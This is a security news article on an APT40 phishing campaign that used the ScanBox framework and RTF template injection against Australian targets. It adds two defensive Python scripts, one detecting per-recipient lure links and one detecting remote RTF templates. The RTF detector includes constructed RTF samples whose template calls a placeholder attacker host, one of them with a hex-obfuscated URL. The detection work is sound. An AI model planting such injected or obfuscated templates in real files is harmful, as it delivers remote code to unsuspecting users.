
Chinese Hackers Strike Down Under
Phishing Scam Derails Australian Government
According to the Australian government, Chinese hackers have begun to target Australian agencies and wind turbine fleets in the South China Sea. In this campaign, individuals who met certain criteria were directed by phishing emails to a fake Australian news media outlet, where they received a malicious JavaScript payload delivered through the ScanBox reconnaissance framework.
The campaign ran from April to June of this year, directed at employees of regional and national Australian government departments, local and international news media outlets, and companies that maintain and monitor the wind turbines in the South China Sea.
According to security analysts at PricewaterhouseCoopers and Proofpoint, the campaign was concocted as a means of cyber espionage on the Australian government. As a result of studying the nature of the attack, they have reason to believe that the APT40 Group, based in China, is responsible for the hack. The group is also known as Red Ladon, Leviathan, and TA423.
Fake “Australian Morning News”
At least six Chinese-affiliated hacking groups have used ScanBox in past intrusions, and there is solid evidence that the toolkit has been in use since at least 2014. Further investigation showed that the attackers, posing as employees of a fictitious media outlet, “Australian Morning News,” included a URL to the malicious website in their emails. The website featured content plagiarized from legitimate news sites.
Although every link led to the same page and the same malicious payload, the researchers note that the URLs also carried values specific to each victim. ScanBox loaded its plugins selectively, which reduces the likelihood of crashes and failures that would attract security researchers’ attention.
The ScanBox framework includes several modules: a keylogger that records keystrokes typed inside a ScanBox iframe; identification of installed browser plugins; browser fingerprinting, which identifies and evaluates the technical capabilities of the victim’s browser; and a WebRTC module for peer-to-peer real-time communication through browser APIs. Finally, the malware checks whether Kaspersky security software is present on the victim’s computer.
Once these checks pass and the chosen plugins have been loaded, the framework begins sending back the victim’s profile information, technical specifications, and other data useful for reconnaissance and basic espionage on the compromised computer.
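The per-victim URL values described above give defenders a usable signal in mail-gateway logs: a legitimate newsletter sends every recipient the same link, whereas a targeted lure sends each recipient a link whose query string is unique to them. The script below is an added example, not code from the article or from the researchers it cites; it groups constructed log lines by host and path and flags any landing page for which every recipient received a distinct query string. The log format, the threshold of three recipients and all hostnames are assumptions.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed mail-gateway log lines (not from the article): "timestamp recipient url".
# The first four recipients each get a different ?id= value for the same landing page;
# the last three get an identical newsletter link.
LOG_LINES = [
    "2022-05-03T08:12:01Z alice@agency.example.gov.au https://news-placeholder.example/article?id=a81f3c",
    "2022-05-03T08:12:04Z bob@agency.example.gov.au https://news-placeholder.example/article?id=9c2d77",
    "2022-05-03T08:12:09Z carol@media.example.com https://news-placeholder.example/article?id=e4b0a1",
    "2022-05-03T08:15:22Z dave@turbineops.example https://news-placeholder.example/article?id=5f61de",
    "2022-05-03T09:00:00Z alice@agency.example.gov.au https://legit-news.example/daily?edition=2022-05-03",
    "2022-05-03T09:00:00Z bob@agency.example.gov.au https://legit-news.example/daily?edition=2022-05-03",
    "2022-05-03T09:00:00Z carol@media.example.com https://legit-news.example/daily?edition=2022-05-03",
]


def parse_line(line):
    """Split one assumed log line into (timestamp, recipient, url)."""
    ts, rcpt, url = line.split()
    return ts, rcpt, url


def find_per_recipient_links(lines, min_recipients=3):
    """Return landing pages (host, path) where each recipient got a unique query string.

    A page is flagged when it was sent to at least `min_recipients` people and no two
    recipients share the same query string, which is the tracking pattern of a
    targeted lure rather than a broadcast mailing. The threshold is a heuristic.
    """
    # (host, path) -> query string -> set of recipients who received that exact query
    pages = defaultdict(lambda: defaultdict(set))
    for line in lines:
        _, rcpt, url = parse_line(line)
        parts = urlsplit(url)
        pages[(parts.netloc.lower(), parts.path)][parts.query].add(rcpt)

    flagged = []
    for (host, path), by_query in pages.items():
        recipients = set().union(*by_query.values())
        each_query_unique = all(len(rcpts) == 1 for rcpts in by_query.values())
        if each_query_unique and len(recipients) >= min_recipients:
            flagged.append({"host": host, "path": path, "recipients": len(recipients)})
    return sorted(flagged, key=lambda f: (f["host"], f["path"]))


if __name__ == "__main__":
    for hit in find_per_recipient_links(LOG_LINES):
        print(f"per-recipient link: https://{hit['host']}{hit['path']} "
              f"sent to {hit['recipients']} recipients with distinct tokens")
```

Running the script flags only the fake news page; the newsletter, which uses one shared `edition` value, is left alone. In a real deployment the hit list would be joined against domain age and reputation data before anyone is alerted.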
COVID-19 Passport Services Hack
In some instances seen in June 2022, the hackers used COVID-19 passport service lures that downloaded a DLL stager for loading Meterpreter, targeting Australian naval defence, oil and petroleum, and deep-water drilling enterprises. Proofpoint later assessed, based on the targeting, tactics and tools observed, that the 2022 campaign was the third phase of the same intelligence-gathering effort APT40 has been conducting since March 2021.
In these cases the hackers posed as journalists from publications such as “The Australian” and “Herald Sun,” using RTF template injection to install Meterpreter on the victims’ computers. Analysts have observed ScanBox in APT40 activity continuously since 2018.
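RTF template injection works by placing an `\*\template` control word in the document that points at a remote URL instead of a local template, so a scanner at the mail gateway can catch the technique before the file is opened. The checker below is an added example and not code from the article or from any of the researchers it cites; the sample RTF documents are constructed, the hostname is a placeholder, and the decision to treat only `http`, `https` and `ftp` targets as remote is an assumption.

```python
import re

# Constructed sample documents (not real malware). Raw byte strings keep the RTF
# backslashes literal. The last one hides the URL scheme behind \'hh hex escapes,
# which RTF readers decode before use.
BENIGN_RTF = rb"{\rtf1\ansi\deff0 {\fonttbl{\f0 Arial;}} Quarterly report text.\par}"
LOCAL_TEMPLATE_RTF = rb"{\rtf1\ansi {\*\template C:\\Templates\\normal.dotm} body\par}"
REMOTE_TEMPLATE_RTF = rb"{\rtf1\ansi {\*\template http://attacker-placeholder.example/t.dotm} body\par}"
OBFUSCATED_RTF = rb"{\rtf1\ansi {\*\template \'68\'74\'74\'70://attacker-placeholder.example/t.dotm} body\par}"

# \'hh is the RTF escape for one byte written in hex.
HEX_ESCAPE = re.compile(rb"\\'([0-9a-fA-F]{2})")
# The template destination group: \*\template followed by its target, up to the closing brace.
TEMPLATE_RE = re.compile(rb"\\\*\\template\b\s*([^}]*)", re.IGNORECASE)
# Assumed set of schemes that make a template target remote.
REMOTE_SCHEME_RE = re.compile(rb"^(?:https?|ftp)://", re.IGNORECASE)


def normalise_rtf(data: bytes) -> bytes:
    """Decode \\'hh hex escapes so obfuscated control words and URLs become visible."""
    return HEX_ESCAPE.sub(lambda m: bytes.fromhex(m.group(1).decode("ascii")), data)


def find_template_targets(data: bytes) -> list[bytes]:
    """Return every template target referenced by the document, after de-obfuscation."""
    return [m.group(1).strip() for m in TEMPLATE_RE.finditer(normalise_rtf(data))]


def classify_rtf(data: bytes) -> str:
    """Label a document: 'remote-template' (injection shape), 'local-template' or 'clean'."""
    targets = find_template_targets(data)
    if any(REMOTE_SCHEME_RE.match(t) for t in targets):
        return "remote-template"
    return "local-template" if targets else "clean"


if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_RTF), ("local", LOCAL_TEMPLATE_RTF),
                      ("remote", REMOTE_TEMPLATE_RTF), ("obfuscated", OBFUSCATED_RTF)]:
        print(f"{name:10s} -> {classify_rtf(doc)}")
```

Decoding the hex escapes before matching is the step that matters in practice: a check that only greps the raw bytes for `http://` misses the obfuscated variant, while the RTF parser in the target application decodes it without difficulty.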